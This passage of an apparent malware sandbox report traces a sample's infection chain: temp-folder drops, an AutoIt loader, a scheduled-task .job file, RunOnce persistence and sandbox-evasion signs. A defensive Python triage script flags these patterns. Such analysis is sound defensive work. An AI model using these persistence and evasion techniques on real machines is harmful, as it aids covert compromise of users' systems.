          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wbemcomn.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: dwrite.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: d2d1.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: oledlg.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: oleacc.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: pla.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: pdh.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: tdh.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: cabinet.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: wevtapi.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: mstask.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: textinputframework.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: MilwaukeeRivers.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\rrwkeeb
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\rrwkeeb
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Windows\Tasks\MB Led SDK.job
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
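The rows above are the persistence chain a responder has to act on: cmd.exe drops a .pif into %TEMP%, that .pif drops two more executables, more.com writes an extensionless file into %TEMP% plus a legacy .job file under C:\Windows\Tasks, and the Temp-resident AutoIt3.exe sets a RunOnce value. The following Python script is an added triage example, not part of the Joe Sandbox report: it parses rows in the report's extracted form (where the source path runs straight into the event label and dropped-file rows carry the page's "Jump to dropped file" link text), applies a handful of persistence rules, and collapses the report's verbatim duplicate rows. The sample rows are constructed from this report's own entries; the rule names, severities and the short LOLBin list are the author's assumptions, not a Joe Sandbox or Sigma convention.

```python
"""Turn extracted sandbox behaviour rows into persistence findings (added example)."""
import re
from collections import Counter
from dataclasses import dataclass

# In the extracted report the source path runs straight into the event label
# ("cmd.exeFile created: ..."), so the source is matched non-greedily up to the
# first known label.
EVENT_LABELS = (
    "Registry value created or modified",
    "Process created",
    "Module Loaded",
    "Section loaded",
    "File created",
)
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)(?P<event>"
    + "|".join(re.escape(label) for label in EVENT_LABELS)
    + r"):\s*(?P<detail>.*)$"
)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
AUTORUN_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
LOLBINS = {"cmd.exe", "more.com", "powershell.exe"}       # assumption: extend for your estate
EXEC_EXTS = {".exe", ".dll", ".pif", ".scr", ".com", ""}  # "" means no extension at all
DECEPTIVE_EXTS = {".pif", ".scr", ".com", ""}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    source: str
    detail: str


def parse_line(line):
    """Return (source, event, detail) for one behaviour row, or None if it is not a row."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # The HTML report appends a "Jump to dropped file" link to dropped-file rows.
    detail = re.sub(r"\s*Jump to dropped file$", "", m["detail"]).strip()
    return m["source"].strip(), m["event"], detail


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def _ext(path):
    name = _basename(path)
    return name[name.rfind("."):].lower() if "." in name else ""


def evaluate(source, event, detail):
    """Apply the persistence rules to one parsed row and return its findings."""
    findings = []
    src_lolbin = _basename(source).lower() in LOLBINS
    src_temp = bool(TEMP_RE.search(source))
    if event == "File created":
        if TEMP_RE.search(detail) and _ext(detail) in EXEC_EXTS and (src_lolbin or src_temp):
            sev = "high" if _ext(detail) in DECEPTIVE_EXTS else "medium"
            findings.append(Finding("temp_drop_by_lolbin_or_temp_binary", sev, source, detail))
        if detail.lower().startswith("c:\\windows\\tasks\\") and detail.lower().endswith(".job"):
            # Legacy .job files under C:\Windows\Tasks are a scheduled-task autostart.
            findings.append(Finding("job_file_created", "high", source, detail))
    elif event == "Registry value created or modified":
        if AUTORUN_RE.search(detail) and src_temp:
            findings.append(Finding("autorun_key_set_from_temp", "high", source, detail))
    elif event == "Module Loaded":
        if TEMP_RE.search(detail) and _ext(detail) == "":
            findings.append(Finding("module_loaded_from_temp_without_extension", "high", source, detail))
    elif event == "Process created" and src_temp:
        findings.append(Finding("temp_binary_spawns_process", "low", source, detail))
    return findings


def triage(lines):
    """Parse and evaluate every row; drop the report's verbatim duplicate rows, keep order."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            findings.extend(evaluate(*parsed))
    return list(dict.fromkeys(findings))


def summarize(findings):
    return dict(Counter(f.severity for f in findings))


# Constructed from this report's own rows; the rrwkeeb row keeps the page's link text on purpose.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif",
    r"Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif",
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe",
    r"Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\rrwkeebJump to dropped file",
    r"Source: C:\Windows\SysWOW64\more.comFile created: C:\Windows\Tasks\MB Led SDK.job",
    r"Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg",
    r"Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg",
    r"Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe",
    r"Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB",
    r"Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: apphelp.dll",
    "barindex",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.severity:6}] {f.rule}: {_basename(f.source)} -> {f.detail}")
    print(summarize(triage(SAMPLE_LINES)))
```

Run stand-alone it prints one finding per unique row that matched a rule and a severity count; the two duplicate Comparing.pif rows and the two duplicate RunOnce rows collapse to one finding each, and the Section loaded row parses but yields nothing. The same functions can be pointed at the full exported report text by feeding its lines to `triage`.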

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif System information queried: FirmwareTableInformation
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe API/Special instruction interceptor: Address: 6BEA7C44
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe API/Special instruction interceptor: Address: 6BEA7945
          Source: C:\Windows\SysWOW64\more.com API/Special instruction interceptor: Address: 6BEA3B54
          Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 101A317
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2267
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1869
          Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rrwkeeb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6184 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6212 Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6212 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6844 Thread sleep time: -30000s >= -30000s
